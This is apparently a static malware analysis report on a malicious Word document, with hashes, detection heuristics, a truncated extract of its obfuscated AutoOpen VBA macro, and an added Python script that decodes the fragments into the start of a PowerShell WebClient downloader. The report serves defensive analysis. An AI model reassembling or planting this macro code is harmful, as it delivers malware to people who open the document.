Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd54d27e266b24e7…

MALICIOUS

Office (OLE)

Size: 97.8 KB
Created: 2018-06-19 17:25:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 8e54bb6fb7c875e96123ec954bba1dd2
SHA-1: 7e48c0a48e73a74ccf1bf5d7201e0a29602f52ee
SHA-256: bd54d27e266b24e7ee3d54acb02c4477431557606af97a9c3778680b856f6e30
Risk score: 242

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6600001-0 (critical, CLAMAV_DETECTION)
    ClamAV signature match: Doc.Dropper.Agent-6600001-0.
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    The document contains a VBA project; its decoded source is carved out as macros.bas below.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro source calls Shell(), which starts an external process. The visible part of the extracted source builds its command line piecewise from short string fragments, so the argument passed to Shell() only exists at run time.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened (subject to the user's macro security setting), so no further interaction is needed once macros are enabled.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) and cache streams contain an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents, and documents whose source extraction fails, where no readable VBA source is available; here it corroborates the source-level findings above.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence of the old Word macro execution surface, not by itself a downloader or parser-CVE attribution. Note that this rule text is generic: for this sample a VBA project was recovered (macros.bas below), so read this finding together with OLE_VBA_AUTOOPEN rather than as evidence of a WordBasic-only document.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace, which appears in any Office file that embeds drawing markup; it is an expected artefact of the format, not a network indicator. Any URL the macro itself uses would be built at run time from the obfuscated fragments in macros.bas and is therefore not visible to plain URL extraction.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  11080 bytes
            SHA-256: fa2f11a03ec10990a5458811f67e8df59a5361b242f0c4fe55bd513d4e89bfc5
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "CwHXkhsHNj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KcvZJVMa"
Function zJRWMQvS()
On Error Resume Next
aWzsGB = 40140
wjmrnw = 40624
swLZid = GkMqU
tvoBr = CByte(okYZE)
HYJjE = CDate(lWNQm + Sin(51511 + 34821) * 13492 * CInt(13681))
sdkLUn = CDate(7179)
dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45"
rlNAv = 26422
FwoiRX = 14812
nHzXOZ = wjFEb
dZlWIT = CByte(cijdW)
miLFmq = CDate(zXuQGu + Sin(37775 + 11925) * 73698 * CInt(10440))
zsMQa = CDate(73132)
rkhYAwITYrX = "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-" + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99"
wiKEq = 5144
kRfZFk = 31087
wUvEG = kbbww
cjtGH = CByte(nizPT)
VhTKY = CDate(OWcYSd + Sin(17972 + 99121) * 42867 * CInt(99882))
inHiuv = CDate(61898)
OPlhOnj = "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48"
DmEVfo = 32399
PihjEQ = 2558
wNiCai = TVodhA
zqdjR = CByte(WwakV)
ftIZS = CDate(bkdRor + Sin(75561 + 10860) * 83163 * CInt(76337))
Riizd = CDate(33781)
fOoiliD = "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4" + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y"
zJRWMQvS = dFIfnsVKlUG + rkhYAwITYrX + OPlhOnj + fOoiliD
End Function
Function DQYKkfLBn()
On Error Resume Next
QwBnz = 46627
mqXsf = 73220
DkmzuQ = QLOds
hIZuzz = CByte(mJFLY)
FikMwU = CDate(boihCz + Sin(52851 + 76956) * 61841 * CInt(7021))
wIzDc = CDate(63293)
jPzvVj = "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u" + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g"
SmrBU = 10559
wcLpz = 59876
hFBwDq = CiLEV
IaiIc = CByte(RZwwFn)
REwoo = CDate(ppbZz + Sin(4279 + 29870) * 86757 * CInt(20208))
siJZz = CDate(93321)
MHjQtmHZh = "48@48Z10" + "5Y35u40@36u" + "47>40Y46m44&4" + "6%35u" + "52-" + "105Y36Y" + "40m42m104g31>13"
Qjzqku = 3891
dpTUE = 52223
mdmWqS = CNiCjj
XADYai = CByte(cTvwHa)
mFAun = CDate(Mrlht + Sin(53878 + 85575) * 60414 * CInt(4236))
tGdDU = CDate(53397)
AMzDfFWMAZ = "-15" + "g3&" + "54m13u5" + "4>116" + ">104m7m4" + "7>51&" + "51-55&1" + "25>104u104u48%4" + "8Y48u105m37m4" + "0@40"
cmwtC = 61798
ncfkhN = 8556
wqBtY = lDvdZ
iWrbrZ = CByte(FRTJwh)
CuHcJq = CDate(qGkiw + Sin(64812 + 92351) * 62445 * CInt(84761))
CcHvQ = CDate(20103)
wwpnQu = "m42m55@38" + "Y36>44m1" + "05Z36g40m4" + "2Z104m10m119m3u"
mbhko = 90836
kwhjXO = 21022
CSdpW = UCzOZU
azANWk = CByte(waJidd)
lEiPEH = CDate(RHdiO + Sin(65645 + 21340) * 8141 * CInt(91181))
ZNMkn = CDate(56847)
DQbTmZuN = "55g22@2m119" + "Y104Z7" + "u47&51%51" + "-55m125%104" + ">104%48Z48@48-" + "105Z47m" + "38Z36m46Y38-"
DQYKkfLBn = jPzvVj + MHjQtmHZh + AMzDfFWMAZ + wwpnQu + DQbTmZuN
End Function
Function mdPiDBrp()
On Error Resume Next
EihoAi = 95686
zRcpf = 35520
EBaFG = aZbKkK
DPvKUS = CByte(hVAJPT)
DjwWIa = CDate(lpnJE + Sin(10352 + 31194) * 75571 * CInt(3565))
NHtkw = CDate(70975)
nEAHznSmR = "53>34&52Y40" + "-53@51u105>" + "36>" + "40-42@10"
VZcYoz = 58666
LscwfM = 99530
uXnXD = jaric
OuZFp = CByte(uJlzzX)
QQEEP = CDate(JwIaUa + Sin(28218 + 26027) * 30141 * CInt(19536))
hPjbGj = CDate(51601)
cIhcLTwSn = "4-45u3g49Z" + "38-4Z30>12-63g1" + "15u104Z" + "7&4" + "7Z51-51Z55" + "Z125Z104g104-4" + "8g48u48%105>3" + "3m53Y38g41%" + "44%52Y42&" + "46%52g52Y46>"
XAaDE = 80500
BZokK = 55817
iIKcS = NRlokQ
iwiTA = CByte(WLLmz)
nBrCa = CDate(loDVj + Sin(5506 + 24424) * 50523 * CInt(60940))
NVdYN = CDate(64780)
tNunv = "40Y41g105Z36" + "u40m42u104-49m" + "19%117%2Z3" + "3Z10" + "g104%7g47m" + "51Z51&55m125" + "u10" + "4%104%48" + "@48Z48>105" + "g36"
naQlfU = CDate(78314)
nuHDO = 70581
UJzIkK = CDate(jBGNi + Sin(62345 + 45040) * 79139 * CInt(3504))
ziiYk = zQBhN
WYuvmV = 35961
qckmm = CByte(RzPDFn)
wtQMaMol = ">38Y4" + "1-36Z40g42g46&3" + "6Y105m36%40u42u" + "104Z23Y35-46Y" + "6m53u19" + "%29-10" + "4m96m105@2"
idDFfi = CD
... (truncated)
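Worked example: recovering the command line from the fragments above. This Python script is added here for illustration; it is not part of the scanner output, of oletools, or of the sample. It takes the string-building lines copied from the macros.bas preview (function zJRWMQvS and the first string of DQYKkfLBn), collapses each "a" + "b" + ... assignment into one literal, follows the zJRWMQvS = ... + ... line to put the pieces in order, and then treats the non-digit characters in the payload as separators, which is what the visible prefix [STrInG]::jOiN( '' ,( ' suggests PowerShell does on the receiving side. The per-character transform that turns each number into a character is not visible in the truncated listing; the script assumes a single-byte XOR (an assumption, labelled as such in the code) and recovers the key by a known-plaintext search for "new-object", a string a PowerShell downloader of this shape needs. Function and variable names (collapse_strings, resolve, number_sequence, xor_keys_for_crib, recover_powershell, suspicious_literals, SAMPLE) are the example's own. It also shows why the report has to match on collapsed, case-folded strings: the raw line carries "OwerSHell", not "powershell".

```python
import re
from typing import Dict, List

# Lines copied from the macros.bas preview above (function zJRWMQvS, plus the
# first string of DQYKkfLBn).  The integer/CDate()/CByte() filler lines are kept
# on purpose: the parser must ignore them, as it would on the full dump.
SAMPLE = r"""
Function zJRWMQvS()
On Error Resume Next
aWzsGB = 40140
swLZid = GkMqU
HYJjE = CDate(lWNQm + Sin(51511 + 34821) * 13492 * CInt(13681))
dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45"
rkhYAwITYrX = "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-" + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99"
OPlhOnj = "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48"
fOoiliD = "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4" + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y"
zJRWMQvS = dFIfnsVKlUG + rkhYAwITYrX + OPlhOnj + fOoiliD
End Function
Function DQYKkfLBn()
jPzvVj = "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u" + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g"
End Function
"""

LITERAL = re.compile(r'"([^"]*)"')                  # one VBA string literal
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")   # name = right-hand side


def collapse_strings(vba: str) -> Dict[str, str]:
    """Map each  name = "a" + "b" + ...  line to its joined literal.

    Only lines whose right-hand side is nothing but literals joined by '+' are
    taken; the numeric and CDate()/CByte() filler is ignored.  (VBA escapes a
    quote inside a literal as "", which this simple regex does not handle;
    none occur in this sample.)
    """
    out: Dict[str, str] = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        parts = LITERAL.findall(rhs)
        if parts and LITERAL.sub("", rhs).strip(" +") == "":
            out[name] = "".join(parts)
    return out


def resolve(vba: str, target: str) -> str:
    """Follow  target = v1 + v2 + ...  and join the collapsed literals in that order."""
    literals = collapse_strings(vba)
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if m and m.group(1) == target:
            return "".join(literals[n.strip()] for n in m.group(2).split("+"))
    raise KeyError(f"no assignment to {target}")


def suspicious_literals(vba: str, needles=("owershell", "wscript", "http")) -> Dict[str, str]:
    """Case-insensitive match over the *collapsed* literals.  The sample splits and
    re-cases its strings ("OwerSHell"), so matching raw lines for 'powershell'
    misses it; the leading 'P' is not even in this fragment."""
    return {n: v for n, v in collapse_strings(vba).items()
            if any(s in v.lower() for s in needles)}


def number_sequence(payload: str) -> List[int]:
    """Everything after the last single quote is the delimited number blob; the
    letters and punctuation between the numbers (Y > % @ Z u g m - &) are only
    separators, so each maximal run of digits is one value."""
    blob = payload.rsplit("'", 1)[-1]
    return [int(d) for d in re.findall(r"\d+", blob)]


def xor_keys_for_crib(nums: List[int], crib: bytes) -> List[int]:
    """Single-byte XOR keys under which the decoded bytes contain the expected
    plaintext.  ASSUMPTION (not visible in the truncated listing): the per-
    character transform is XOR with a constant.  An empty result means the
    transform is something else and must be read out of the rest of the macro."""
    return [k for k in range(256) if crib in bytes(n ^ k for n in nums)]


def xor_decode(nums: List[int], key: int) -> str:
    return bytes(n ^ key for n in nums).decode("latin-1")


def recover_powershell(vba: str, target: str, crib: bytes = b"new-object") -> str:
    """End to end: collapse, order, extract the numbers, find the key, decode."""
    nums = number_sequence(resolve(vba, target))
    keys = xor_keys_for_crib(nums, crib)
    if len(keys) != 1:
        raise ValueError(f"expected exactly one key, got {keys}")
    return xor_decode(nums, keys[0])


if __name__ == "__main__":
    print("flagged literals:", list(suspicious_literals(SAMPLE)))
    nums = number_sequence(resolve(SAMPLE, "zJRWMQvS"))
    print("candidate keys:", xor_keys_for_crib(nums, b"new-object"))
    print("zJRWMQvS ->", recover_powershell(SAMPLE, "zJRWMQvS"))
    print("jPzvVj   ->", xor_decode(number_sequence(collapse_strings(SAMPLE)["jPzvVj"]), 71))
```

Run stand-alone, the search reports 71 as the only key under which the crib appears, and the zJRWMQvS fragment decodes to "$vzjqi = new-object random;$Cpzkbo = new-object System.Net.WebClie". The first string of DQYKkfLBn, decoded under the same key, continues it with "nt;$RWoll = 'http://w", which also settles the order in which the listing's functions are concatenated even though the joining code is past the truncation point. Zero or several candidate keys would mean the transform is not a plain XOR; the next step is then to pull the decode expression itself out of the remainder of the macro (the Shell() call the OLE_VBA_SHELL rule fired on) rather than to keep guessing.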